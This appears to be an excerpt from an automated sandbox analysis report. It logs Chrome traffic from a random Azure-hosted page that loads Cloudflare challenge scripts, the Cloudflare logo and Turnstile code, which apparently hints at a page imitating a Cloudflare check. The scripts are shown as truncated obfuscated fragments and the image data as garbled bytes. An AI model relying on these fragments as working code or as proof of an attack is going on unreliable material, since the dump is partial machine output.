                                                                                                                                                                                                                                2024-10-03 20:57:04 UTC650INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:04 GMT
                                                                                                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 8065
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cache-control: max-age=14400, stale-if-error=10800, stale-while-revalidate=10800, public
                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n5bO1%2BB8E5qyzkO5gGMl%2B9upHULDSHwqnrbO%2B1wGGgC1T0MxlR2%2Fm95FneQTRFxzZOboZyp%2BNLck%2FEFeyrAfCIh78HJVpWPYZZQ2eaZkBdCrgOSxp%2BzMr40Gx25nYpOs"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd7ac3a5d15d7-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:04 UTC719INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 46 50 57 76 3a 27 67 27 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 56 2c 67 2c 68 2c 69 2c 6a 2c 6e 2c 6f 2c 76 29 7b 56 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 64 2c 65 2c 55 2c 66 2c 43 29 7b 66 6f 72 28 55 3d 62 2c 66 3d 64 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 43 3d 70 61 72 73 65 49 6e 74 28 55 28 34 36 32 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 55 28 34 33 39 29 29 2f 32 2a 28 2d 70 61 72 73 65 49 6e 74 28 55 28 34 33 33 29 29 2f 33 29 2b 2d 70 61 72 73 65 49 6e 74 28 55 28 34 32 30 29 29 2f 34 2b 2d 70 61 72 73 65 49 6e 74 28 55 28 34 33 31 29 29 2f 35 2a 28 2d 70 61 72 73 65 49 6e 74 28 55 28 34 37 38 29 29 2f 36 29 2b 2d 70 61 72 73 65 49 6e 74 28 55 28 35 31 34 29 29 2f 37 2a 28 70
                                                                                                                                                                                                                                Data Ascii: window._cf_chl_opt={cFPWv:'g'};~function(V,g,h,i,j,n,o,v){V=b,function(d,e,U,f,C){for(U=b,f=d();!![];)try{if(C=parseInt(U(462))/1+parseInt(U(439))/2*(-parseInt(U(433))/3)+-parseInt(U(420))/4+-parseInt(U(431))/5*(-parseInt(U(478))/6)+-parseInt(U(514))/7*(p
                                                                                                                                                                                                                                2024-10-03 20:57:04 UTC1369INData Raw: 34 38 36 29 5d 5b 61 30 28 34 36 33 29 5d 28 6e 65 77 20 43 5b 28 61 30 28 34 38 31 29 29 5d 28 48 29 29 3a 66 75 6e 63 74 69 6f 6e 28 4e 2c 61 31 2c 4f 29 7b 66 6f 72 28 61 31 3d 61 30 2c 4e 5b 61 31 28 34 35 30 29 5d 28 29 2c 4f 3d 30 3b 4f 3c 4e 5b 61 31 28 35 30 35 29 5d 3b 4e 5b 4f 5d 3d 3d 3d 4e 5b 4f 2b 31 5d 3f 4e 5b 61 31 28 34 39 35 29 5d 28 4f 2b 31 2c 31 29 3a 4f 2b 3d 31 29 3b 72 65 74 75 72 6e 20 4e 7d 28 48 29 2c 49 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 49 3d 49 5b 61 30 28 34 37 31 29 5d 5b 61 30 28 34 34 32 29 5d 28 49 29 2c 4a 3d 30 3b 4a 3c 48 5b 61 30 28 35 30 35 29 5d 3b 4b 3d 48 5b 4a 5d 2c 4c 3d 6c 28 43 2c 44 2c 4b 29 2c 49 28 4c 29 3f 28 4d 3d 27 73 27 3d 3d 3d 4c 26 26 21 43 5b 61 30 28 34 32 35 29 5d
                                                                                                                                                                                                                                Data Ascii: 486)][a0(463)](new C[(a0(481))](H)):function(N,a1,O){for(a1=a0,N[a1(450)](),O=0;O<N[a1(505)];N[O]===N[O+1]?N[a1(495)](O+1,1):O+=1);return N}(H),I='nAsAaAb'.split('A'),I=I[a0(471)][a0(442)](I),J=0;J<H[a0(505)];K=H[J],L=l(C,D,K),I(L)?(M='s'===L&&!C[a0(425)]
                                                                                                                                                                                                                                2024-10-03 20:57:04 UTC1369INData Raw: 2c 54 3e 3e 3d 31 2c 47 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 54 3d 31 2c 47 3d 30 3b 47 3c 4d 3b 4f 3d 4f 3c 3c 31 7c 54 2c 45 2d 31 3d 3d 50 3f 28 50 3d 30 2c 4e 5b 61 36 28 34 38 34 29 5d 28 46 28 4f 29 29 2c 4f 3d 30 29 3a 50 2b 2b 2c 54 3d 30 2c 47 2b 2b 29 3b 66 6f 72 28 54 3d 4a 5b 61 36 28 35 30 33 29 5d 28 30 29 2c 47 3d 30 3b 31 36 3e 47 3b 4f 3d 4f 3c 3c 31 7c 31 2e 32 31 26 54 2c 50 3d 3d 45 2d 31 3f 28 50 3d 30 2c 4e 5b 61 36 28 34 38 34 29 5d 28 46 28 4f 29 29 2c 4f 3d 30 29 3a 50 2b 2b 2c 54 3e 3e 3d 31 2c 47 2b 2b 29 3b 7d 4b 2d 2d 2c 30 3d 3d 4b 26 26 28 4b 3d 4d 61 74 68 5b 61 36 28 34 34 39 29 5d 28 32 2c 4d 29 2c 4d 2b 2b 29 2c 64 65 6c 65 74 65 20 49 5b 4a 5d 7d 65 6c 73 65 20 66 6f 72 28 54 3d 48 5b 4a 5d 2c 47 3d 30 3b 47 3c 4d
                                                                                                                                                                                                                                Data Ascii: ,T>>=1,G++);}else{for(T=1,G=0;G<M;O=O<<1|T,E-1==P?(P=0,N[a6(484)](F(O)),O=0):P++,T=0,G++);for(T=J[a6(503)](0),G=0;16>G;O=O<<1|1.21&T,P==E-1?(P=0,N[a6(484)](F(O)),O=0):P++,T>>=1,G++);}K--,0==K&&(K=Math[a6(449)](2,M),M++),delete I[J]}else for(T=H[J],G=0;G<M
                                                                                                                                                                                                                                2024-10-03 20:57:04 UTC1369INData Raw: 4e 26 4f 2c 4f 3e 3e 3d 31 2c 30 3d 3d 4f 26 26 28 4f 3d 45 2c 4e 3d 46 28 50 2b 2b 29 29 2c 51 7c 3d 28 30 3c 53 3f 31 3a 30 29 2a 4d 2c 4d 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 51 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 51 3d 30 2c 52 3d 4d 61 74 68 5b 61 39 28 34 34 39 29 5d 28 32 2c 38 29 2c 4d 3d 31 3b 52 21 3d 4d 3b 53 3d 4e 26 4f 2c 4f 3e 3e 3d 31 2c 30 3d 3d 4f 26 26 28 4f 3d 45 2c 4e 3d 46 28 50 2b 2b 29 29 2c 51 7c 3d 4d 2a 28 30 3c 53 3f 31 3a 30 29 2c 4d 3c 3c 3d 31 29 3b 54 3d 65 28 51 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 51 3d 30 2c 52 3d 4d 61 74 68 5b 61 39 28 34 34 39 29 5d 28 32 2c 31 36 29 2c 4d 3d 31 3b 4d 21 3d 52 3b 53 3d 4e 26 4f 2c 4f 3e 3e 3d 31 2c 4f 3d 3d 30 26 26 28 4f 3d 45 2c 4e 3d 46 28 50 2b 2b 29 29 2c
                                                                                                                                                                                                                                Data Ascii: N&O,O>>=1,0==O&&(O=E,N=F(P++)),Q|=(0<S?1:0)*M,M<<=1);switch(Q){case 0:for(Q=0,R=Math[a9(449)](2,8),M=1;R!=M;S=N&O,O>>=1,0==O&&(O=E,N=F(P++)),Q|=M*(0<S?1:0),M<<=1);T=e(Q);break;case 1:for(Q=0,R=Math[a9(449)](2,16),M=1;M!=R;S=N&O,O>>=1,O==0&&(O=E,N=F(P++)),
                                                                                                                                                                                                                                2024-10-03 20:57:04 UTC1369INData Raw: 39 30 29 2c 61 64 28 34 39 34 29 29 2c 4c 3d 7b 7d 2c 4c 5b 61 64 28 34 35 33 29 5d 3d 45 2c 4c 5b 61 64 28 35 30 32 29 5d 3d 4b 2c 4c 5b 61 64 28 34 39 38 29 5d 3d 61 64 28 34 38 30 29 2c 4d 3d 76 5b 61 64 28 35 31 31 29 5d 28 4a 53 4f 4e 5b 61 64 28 34 36 35 29 5d 28 4c 29 29 5b 61 64 28 34 32 37 29 5d 28 27 2b 27 2c 61 64 28 34 37 33 29 29 2c 48 5b 61 64 28 35 30 38 29 5d 28 27 76 5f 27 2b 46 2e 72 2b 27 3d 27 2b 4d 29 7d 63 61 74 63 68 28 4e 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 64 2c 65 2c 57 29 7b 72 65 74 75 72 6e 20 57 3d 56 2c 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 64 5b 57 28 34 38 39 29 5d 26 26 30 3c 64 5b 57 28 34 38 39 29 5d 5b 57 28 34 34 37 29 5d 5b 57 28 34 34 31 29 5d 5b 57 28 35 30 36 29 5d 28 65 29 5b 57 28 34 34 33 29 5d 28 57
                                                                                                                                                                                                                                Data Ascii: 90),ad(494)),L={},L[ad(453)]=E,L[ad(502)]=K,L[ad(498)]=ad(480),M=v[ad(511)](JSON[ad(465)](L))[ad(427)]('+',ad(473)),H[ad(508)]('v_'+F.r+'='+M)}catch(N){}}function k(d,e,W){return W=V,e instanceof d[W(489)]&&0<d[W(489)][W(447)][W(441)][W(506)](e)[W(443)](W
                                                                                                                                                                                                                                2024-10-03 20:57:04 UTC1369INData Raw: 35 3b 48 63 54 45 49 33 3b 69 48 77 78 4d 33 3b 56 67 75 79 36 3b 48 76 6d 72 33 3b 4f 75 57 54 37 2c 6c 6f 61 64 69 6e 67 2c 74 69 6d 65 6f 75 74 2c 31 32 34 36 78 6b 6b 76 41 6f 2c 32 38 38 35 36 4f 49 41 63 45 7a 2c 74 6f 53 74 72 69 6e 67 2c 62 69 6e 64 2c 69 6e 64 65 78 4f 66 2c 63 68 61 72 41 74 2c 72 61 6e 64 6f 6d 2c 63 46 50 57 76 2c 70 72 6f 74 6f 74 79 70 65 2c 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2c 70 6f 77 2c 73 6f 72 74 2c 6e 6f 77 2c 6b 65 79 73 2c 6d 73 67 2c 66 72 6f 6d 43 68 61 72 43 6f 64 65 2c 62 69 67 69 6e 74 2c 63 6f 6e 63 61 74 2c 48 76 6d 72 33 2c 61 52 5a 2d 2b 42 4a 68 47 65 4c 79 66 43 58 71 35 63 56 55 73 77 30 33 51 49 45 57 76 53 4b 46 70 62 6c 64 78 7a 6e 67 6b 4d 59 39 50 32 72 4f 74 54 48 41 44 6a 37 6d 75 31 69 6f 34
                                                                                                                                                                                                                                Data Ascii: 5;HcTEI3;iHwxM3;Vguy6;Hvmr3;OuWT7,loading,timeout,1246xkkvAo,28856OIAcEz,toString,bind,indexOf,charAt,random,cFPWv,prototype,contentWindow,pow,sort,now,keys,msg,fromCharCode,bigint,concat,Hvmr3,aRZ-+BJhGeLyfCXq5cVUsw03QIEWvSKFpbldxzngkMY9P2rOtTHADj7mu1io4
                                                                                                                                                                                                                                2024-10-03 20:57:04 UTC501INData Raw: 30 29 7d 2c 43 3d 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 28 29 2c 43 5b 61 63 28 35 31 32 29 5d 28 61 63 28 35 31 35 29 2c 61 63 28 34 36 39 29 2b 67 5b 61 63 28 34 31 32 29 5d 5b 61 63 28 34 34 36 29 5d 2b 61 63 28 34 32 36 29 2b 64 29 2c 43 5b 61 63 28 34 36 38 29 5d 28 61 63 28 35 32 30 29 2c 61 63 28 35 31 30 29 29 2c 43 5b 61 63 28 35 30 38 29 5d 28 4a 53 4f 4e 5b 61 63 28 34 36 35 29 5d 28 66 29 29 7d 66 75 6e 63 74 69 6f 6e 20 73 28 61 33 2c 43 2c 44 2c 45 2c 46 2c 47 29 7b 61 33 3d 56 3b 74 72 79 7b 72 65 74 75 72 6e 20 43 3d 68 5b 61 33 28 34 37 32 29 5d 28 61 33 28 34 38 38 29 29 2c 43 5b 61 33 28 34 37 36 29 5d 3d 61 33 28 35 31 38 29 2c 43 5b 61 33 28 34 32 31 29 5d 3d 27 2d 31 27 2c 68 5b 61 33 28 34 36 31 29 5d 5b 61 33 28 35
                                                                                                                                                                                                                                Data Ascii: 0)},C=new XMLHttpRequest(),C[ac(512)](ac(515),ac(469)+g[ac(412)][ac(446)]+ac(426)+d),C[ac(468)](ac(520),ac(510)),C[ac(508)](JSON[ac(465)](f))}function s(a3,C,D,E,F,G){a3=V;try{return C=h[a3(472)](a3(488)),C[a3(476)]=a3(518),C[a3(421)]='-1',h[a3(461)][a3(5


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                18192.168.2.449772185.15.59.2404432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:04 UTC694OUTGET /wikipedia/commons/thumb/9/94/Cloudflare_Logo.png/1200px-Cloudflare_Logo.png?20211125225208 HTTP/1.1
                                                                                                                                                                                                                                Host: upload.wikimedia.org
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:04 UTC1052INHTTP/1.1 200 OK
                                                                                                                                                                                                                                content-type: image/png
                                                                                                                                                                                                                                content-disposition: inline;filename*=UTF-8''Cloudflare_Logo.png
                                                                                                                                                                                                                                etag: a0b27ae4e940fbf1ec6bdb72da4601e3
                                                                                                                                                                                                                                last-modified: Fri, 13 May 2022 07:55:33 GMT
                                                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                                                content-length: 39856
                                                                                                                                                                                                                                date: Thu, 03 Oct 2024 15:34:05 GMT
                                                                                                                                                                                                                                server: envoy
                                                                                                                                                                                                                                age: 19380
                                                                                                                                                                                                                                x-cache: cp3079 hit, cp3079 miss
                                                                                                                                                                                                                                x-cache-status: hit-local
                                                                                                                                                                                                                                server-timing: cache;desc="hit-local", host;desc="cp3079"
                                                                                                                                                                                                                                strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                x-client-ip: 8.46.123.33
                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                2024-10-03 20:57:04 UTC13855INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 b0 00 00 04 b0 08 06 00 00 00 eb 21 b3 cf 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 00 00 00 00 00 f9 43 bb 7f 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 07 74 49 4d 45 07 e6 05 0d 07 37 1f 2e 03 be d6 00 00 80 00 49 44 41 54 78 da ec dd 77 b8 65 55 7d ff f1 f7 da fb 9c 73 fb 34 98 4a 9b 3b 85 a1 17 e9 20 1d 01 51 44 50 11 7b 6c b1 c5 de a5 ce 0c a8 18 45 63 9a a6 f7 f6 4b 04 2c d1 a8 31 c6 24 c6 44 a3 a8 68 50 ba 28 1d 86 99 db cf 39 7b 7d 7f 7f 0c 1a 2c 20 03 b7 9d 7b df af e7 39 cf 0c 03 c3 3e f7 b3 cf dd
                                                                                                                                                                                                                                Data Ascii: PNGIHDR!gAMAa cHRMz&u0`:pQ<bKGDCpHYstIME7.IDATxweU}s4J; QDP{lEcK,1$DhP(9{}, {9>
                                                                                                                                                                                                                                2024-10-03 20:57:05 UTC16320INData Raw: 3c 61 fc 5b 7f ed 1d 0c 92 26 95 05 96 f4 a0 88 6f 31 7a c9 1a 0a ea 8b 73 ce ef 8c e0 18 bf 47 24 49 92 a4 1d 52 0b e2 c8 2a c2 02 4b d2 a4 72 70 2e 3d 68 e2 fd cf a5 6b c5 8a 5a 15 cd 57 13 3c 03 a8 9b 8a 24 49 92 b4 43 6a 14 b5 a3 53 2a eb 13 e7 2f 33 0d 49 93 c6 02 4b 02 86 37 0d b2 ed 1b 37 33 76 e7 ed 67 47 8e 97 03 03 a6 22 49 92 24 ed b8 a8 aa 5d 52 ad 7b 75 1e 58 61 18 92 26 8d 05 96 e6 bd d1 3f 7d 12 31 31 4e ef de cb 0f 88 c4 eb 80 3d 4c 45 92 24 49 7a ac a3 cc a2 9f 45 bb 9c 12 8b 76 35 0b 49 93 77 68 31 02 cd 77 d5 ad 37 42 77 ef a2 c8 f1 2b 04 4f 34 11 49 92 24 e9 71 48 65 1f f5 de 13 a9 f7 f8 30 24 49 93 c6 02 4b f3 da e8 e6 41 7a ba 52 99 72 75 32 11 cf 37 11 49 92 24 e9 71 8a 2a 45 6b 6c 5d cf af fc cd ea 88 30 0f 49 93 c2 02 4b f3 f7 bc
                                                                                                                                                                                                                                Data Ascii: <a[&o1zsG$IR*Krp.=hkZW<$ICjS*/3IK773vgG"I$]R{uXa&?}11N=LE$IzEv5Iwh1w7Bw+O4I$qHe0$IKAzRru27I$q*Ekl]0IK
                                                                                                                                                                                                                                2024-10-03 20:57:05 UTC9681INData Raw: 5f 3e bf df 5d e6 07 70 4b ad e0 76 d2 93 dc b3 1a bb d8 89 f2 39 9e 6c 9f 6e 63 2d b8 31 42 59 f8 5f d6 b2 d8 09 f0 fc e1 8b 8f 2b 29 4b 7f ff 59 2e 63 e1 f0 13 a7 29 4b 98 e6 f8 71 a5 d7 3f 2e 30 9b 17 82 cd 7b 5e ca c2 80 ef 68 e8 d6 2c f2 be f9 21 e1 fc f0 6c fe 3c e7 2d ef 68 c0 d6 1c 17 da 9d 10 f2 2d 12 e8 1d bf 1e a5 39 56 e3 b0 99 f7 be 13 d6 6d e1 3c 4f 0c f4 ca bc 87 72 92 7d e8 64 c7 97 13 e7 53 4e 35 af 05 83 4f 3f af c5 c7 1d 37 be 9c e1 72 80 55 7a 9d 7e e4 bf 77 f5 d8 f3 a3 bf fd 27 19 d7 ce ce 05 4b 93 73 c1 d3 dc e3 91 bf 45 5e 1f 0d aa ba e1 68 1e 47 ff da d4 05 af 17 8e 1b fd 83 71 ee ef b4 27 57 8b 1c 7b 4b 49 8a da 50 9c d5 97 e3 b5 75 30 f3 eb 49 0e 5c b0 00 6b ea 47 6e c9 da 9b 5f 97 c9 87 3e fb da a4 fe 65 1b 01 00 ce 54 39 a3 c1
                                                                                                                                                                                                                                Data Ascii: _>]pKv9lnc-1BY_+)KY.c)Kq?.0{^h,!l<-h-9Vm<Or}dSN5O?7rUz~w'KsE^hGq'W{KIPu0I\kGn_>eT9


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                19192.168.2.449775188.114.97.34432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:04 UTC786OUTGET /cdn-cgi/challenge-platform/h/g/jsd/r/8ccfd79aee41159f HTTP/1.1
                                                                                                                                                                                                                                Host: scenesaves.me
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                Cookie: yfj4OuVokcr-r5Yc3t2vKL7T6WY=nuPGM69ndnUWQCYHtk_TdhKnn2s; sxfatvqQOuG_GWrQkvDJSWISM2I=1727989014; gIyr5HE-crgK3E6VNTU33nUWWJ4=1728075414; JNdoKP9LXmWrtGUN_i35_8i63I0=aIpJlByV39UwVfSc5gT04x0_D64; 6WJHm1hAUqxGaig1vdLXwAHjqBE=cRrl2AzWkJYyEFavDJ0CEiHqe8Y; jWscW1sM_AmK7armmueciafWe4A=1727989020; gpihpN_E_I-pWnNcHopa5SsNR-Y=1728075420; D6OaV91pWIoe3FS5e1S1dDwbD5Q=hqOfYShwSpn3uAJMb3DpTt_Wa_c
                                                                                                                                                                                                                                2024-10-03 20:57:04 UTC504INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:04 GMT
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                allow: POST
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y%2Bh0V%2B1KcdhBANIq4RM%2BeINH%2BTkjEhddPZgHd7pw4cLA%2F2q1TLbjzpo8hqZVbPlVsfUcVxqhOHfF%2Flq1IJ9BbmHSRi6vImRolYvjO4mu%2BeOVoulqSKyb%2B%2FZu8YRoRrNq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd7adcbc3420d-EWR


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                20192.168.2.449776104.18.94.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:05 UTC583OUTGET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:05 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:05 GMT
                                                                                                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 47262
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                                                last-modified: Tue, 17 Sep 2024 16:06:37 GMT
                                                                                                                                                                                                                                cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd7af3e004391-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                2024-10-03 20:57:05 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 56 74 28 65 2c 72 2c 61 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 66 3d 65 5b 6c 5d 28 67 29 2c 70 3d 66 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 73 29 7b 61 28 73 29 3b 72 65 74 75 72 6e 7d 66 2e 64 6f 6e 65 3f 72 28 70 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 70 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 61 29 3b 66 75 6e 63 74
                                                                                                                                                                                                                                Data Ascii: "use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);funct
                                                                                                                                                                                                                                2024-10-03 20:57:05 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 52 72 28 65 2c 72 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 74 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                                                                                                                                                Data Ascii: e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function tt(e,r){return r=r!=nu
